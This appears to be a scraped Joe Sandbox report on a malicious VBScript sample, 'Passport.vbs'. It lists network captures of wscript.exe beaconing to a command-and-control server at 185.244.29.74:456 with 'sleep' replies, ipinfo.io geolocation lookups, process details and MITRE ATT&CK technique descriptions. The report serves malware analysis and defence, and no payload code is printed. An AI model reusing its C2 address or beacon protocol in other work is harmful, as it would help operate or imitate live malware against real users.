Oct 1, 2024 11:04:25.421895027 CEST	456	49728	185.244.29.74	192.168.2.5
Oct 1, 2024 11:04:25.421952963 CEST	456	49728	185.244.29.74	192.168.2.5
Oct 1, 2024 11:04:25.422117949 CEST	49728	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:04:25.422266960 CEST	49728	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:04:25.427361012 CEST	456	49728	185.244.29.74	192.168.2.5
Oct 1, 2024 11:04:43.405014992 CEST	49729	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:04:43.409925938 CEST	456	49729	185.244.29.74	192.168.2.5
Oct 1, 2024 11:04:43.410026073 CEST	49729	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:04:43.410209894 CEST	49729	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:04:43.415010929 CEST	456	49729	185.244.29.74	192.168.2.5
Oct 1, 2024 11:04:44.245315075 CEST	456	49729	185.244.29.74	192.168.2.5
Oct 1, 2024 11:04:44.245332956 CEST	456	49729	185.244.29.74	192.168.2.5
Oct 1, 2024 11:04:44.245418072 CEST	49729	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:04:44.245537996 CEST	49729	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:04:44.250390053 CEST	456	49729	185.244.29.74	192.168.2.5
Oct 1, 2024 11:04:56.525222063 CEST	49730	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:04:56.530189991 CEST	456	49730	185.244.29.74	192.168.2.5
Oct 1, 2024 11:04:56.530281067 CEST	49730	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:04:56.530431986 CEST	49730	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:04:56.535326004 CEST	456	49730	185.244.29.74	192.168.2.5
Oct 1, 2024 11:04:57.352982044 CEST	456	49730	185.244.29.74	192.168.2.5
Oct 1, 2024 11:04:57.353004932 CEST	456	49730	185.244.29.74	192.168.2.5
Oct 1, 2024 11:04:57.353066921 CEST	49730	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:04:57.353271008 CEST	49730	456	192.168.2.5	185.244.29.74
Oct 1, 2024 11:04:57.358089924 CEST	456	49730	185.244.29.74	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 1, 2024 11:00:58.259149075 CEST	54149	53	192.168.2.5	1.1.1.1
Oct 1, 2024 11:00:58.266417027 CEST	53	54149	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 1, 2024 11:00:58.259149075 CEST	192.168.2.5	1.1.1.1	0x4328	Standard query (0)	ipinfo.io	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 1, 2024 11:00:58.266417027 CEST	1.1.1.1	192.168.2.5	0x4328	No error (0)	ipinfo.io		34.117.59.81	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

ipinfo.io

185.244.29.74:456

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	185.244.29.74	456	5276	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 11:00:59.742336035 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Oct 1, 2024 11:01:00.574543953 CEST	84	IN	HTTP/1.1 200 OK Connection: close Content-Type: text/html Server: Indy/9.0.18

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49709	185.244.29.74	456	5752	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 11:01:12.799550056 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Oct 1, 2024 11:01:13.608066082 CEST	116	IN	HTTP/1.1 200 OK Connection: close Content-Type: text/html Content-Length: 12 Server: Indy/9.0.18 Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30 Data Ascii: sleep<\|>5000

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49716	185.244.29.74	456	5276	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 11:01:31.706521034 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Oct 1, 2024 11:01:32.517271042 CEST	116	IN	HTTP/1.1 200 OK Connection: close Content-Type: text/html Content-Length: 12 Server: Indy/9.0.18 Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30 Data Ascii: sleep<\|>5000

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49717	185.244.29.74	456	5752	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 11:01:44.768646002 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Oct 1, 2024 11:01:45.691143036 CEST	116	IN	HTTP/1.1 200 OK Connection: close Content-Type: text/html Content-Length: 12 Server: Indy/9.0.18 Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30 Data Ascii: sleep<\|>5000

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49719	185.244.29.74	456	5276	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 11:02:03.627883911 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Oct 1, 2024 11:02:04.437534094 CEST	116	IN	HTTP/1.1 200 OK Connection: close Content-Type: text/html Content-Length: 12 Server: Indy/9.0.18 Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30 Data Ascii: sleep<\|>5000

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49720	185.244.29.74	456	5752	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 11:02:16.831486940 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Oct 1, 2024 11:02:17.643846035 CEST	116	IN	HTTP/1.1 200 OK Connection: close Content-Type: text/html Content-Length: 12 Server: Indy/9.0.18 Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30 Data Ascii: sleep<\|>5000

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49721	185.244.29.74	456	5276	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 11:02:35.567428112 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Oct 1, 2024 11:02:36.380686045 CEST	116	IN	HTTP/1.1 200 OK Connection: close Content-Type: text/html Content-Length: 12 Server: Indy/9.0.18 Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30 Data Ascii: sleep<\|>5000

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49722	185.244.29.74	456	5752	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 11:02:48.783741951 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Oct 1, 2024 11:02:49.589329958 CEST	116	IN	HTTP/1.1 200 OK Connection: close Content-Type: text/html Content-Length: 12 Server: Indy/9.0.18 Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30 Data Ascii: sleep<\|>5000

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49723	185.244.29.74	456	5276	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 11:03:07.574738026 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Oct 1, 2024 11:03:08.380716085 CEST	116	IN	HTTP/1.1 200 OK Connection: close Content-Type: text/html Content-Length: 12 Server: Indy/9.0.18 Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30 Data Ascii: sleep<\|>5000

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49724	185.244.29.74	456	5752	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 11:03:20.703315020 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Oct 1, 2024 11:03:21.517085075 CEST	116	IN	HTTP/1.1 200 OK Connection: close Content-Type: text/html Content-Length: 12 Server: Indy/9.0.18 Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30 Data Ascii: sleep<\|>5000

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49725	185.244.29.74	456	5276	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 11:03:39.503453016 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Oct 1, 2024 11:03:40.325642109 CEST	116	IN	HTTP/1.1 200 OK Connection: close Content-Type: text/html Content-Length: 12 Server: Indy/9.0.18 Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30 Data Ascii: sleep<\|>5000

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49726	185.244.29.74	456	5752	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 11:03:52.642071009 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Oct 1, 2024 11:03:53.466299057 CEST	116	IN	HTTP/1.1 200 OK Connection: close Content-Type: text/html Content-Length: 12 Server: Indy/9.0.18 Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30 Data Ascii: sleep<\|>5000

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49727	185.244.29.74	456	5276	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 11:04:11.456177950 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Oct 1, 2024 11:04:12.275533915 CEST	116	IN	HTTP/1.1 200 OK Connection: close Content-Type: text/html Content-Length: 12 Server: Indy/9.0.18 Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30 Data Ascii: sleep<\|>5000

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49728	185.244.29.74	456	5752	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 11:04:24.595041990 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Oct 1, 2024 11:04:25.421895027 CEST	116	IN	HTTP/1.1 200 OK Connection: close Content-Type: text/html Content-Length: 12 Server: Indy/9.0.18 Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30 Data Ascii: sleep<\|>5000

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	49729	185.244.29.74	456	5276	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 11:04:43.410209894 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Oct 1, 2024 11:04:44.245315075 CEST	116	IN	HTTP/1.1 200 OK Connection: close Content-Type: text/html Content-Length: 12 Server: Indy/9.0.18 Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30 Data Ascii: sleep<\|>5000

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	49730	185.244.29.74	456	5752	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
Oct 1, 2024 11:04:56.530431986 CEST	226	OUT	POST /document HTTP/1.1 Accept: / User-Agent: B81A4609 Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate Host: 185.244.29.74:456 Content-Length: 0 Connection: Keep-Alive Cache-Control: no-cache
Oct 1, 2024 11:04:57.352982044 CEST	116	IN	HTTP/1.1 200 OK Connection: close Content-Type: text/html Content-Length: 12 Server: Indy/9.0.18 Data Raw: 73 6c 65 65 70 3c 7c 3e 35 30 30 30 Data Ascii: sleep<\|>5000

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	34.117.59.81	443	5276	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 09:00:58 UTC	320	OUT	GET /country HTTP/1.1 Accept: / Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ipinfo.io Connection: Keep-Alive
2024-10-01 09:00:58 UTC	448	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 3 content-type: text/html; charset=utf-8 date: Tue, 01 Oct 2024 09:00:58 GMT referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-01 09:00:58 UTC	3	IN	Data Raw: 55 53 0a Data Ascii: US

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	34.117.59.81	443	5276	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 09:00:59 UTC	316	OUT	GET /org HTTP/1.1 Accept: / Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ipinfo.io Connection: Keep-Alive
2024-10-01 09:00:59 UTC	449	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 27 content-type: text/html; charset=utf-8 date: Tue, 01 Oct 2024 09:00:59 GMT referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-01 09:00:59 UTC	27	IN	Data Raw: 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 0a Data Ascii: AS3356 Level 3 Parent, LLC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49707	34.117.59.81	443	5752	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 09:01:12 UTC	320	OUT	GET /country HTTP/1.1 Accept: / Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ipinfo.io Connection: Keep-Alive
2024-10-01 09:01:12 UTC	448	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 3 content-type: text/html; charset=utf-8 date: Tue, 01 Oct 2024 09:01:12 GMT referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-01 09:01:12 UTC	3	IN	Data Raw: 55 53 0a Data Ascii: US

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49708	34.117.59.81	443	5752	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 09:01:12 UTC	316	OUT	GET /org HTTP/1.1 Accept: / Accept-Language: en-ch UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: ipinfo.io Connection: Keep-Alive
2024-10-01 09:01:12 UTC	449	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 27 content-type: text/html; charset=utf-8 date: Tue, 01 Oct 2024 09:01:12 GMT referrer-policy: strict-origin-when-cross-origin x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-01 09:01:12 UTC	27	IN	Data Raw: 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 0a Data Ascii: AS3356 Level 3 Parent, LLC

Target ID:	0
Start time:	05:00:56
Start date:	01/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Passport.vbs"
Imagebase:	0x7ff7efb00000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	05:01:09
Start date:	01/10/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Passport.vbs"
Imagebase:	0x7ff7efb00000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Passport.vbs

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

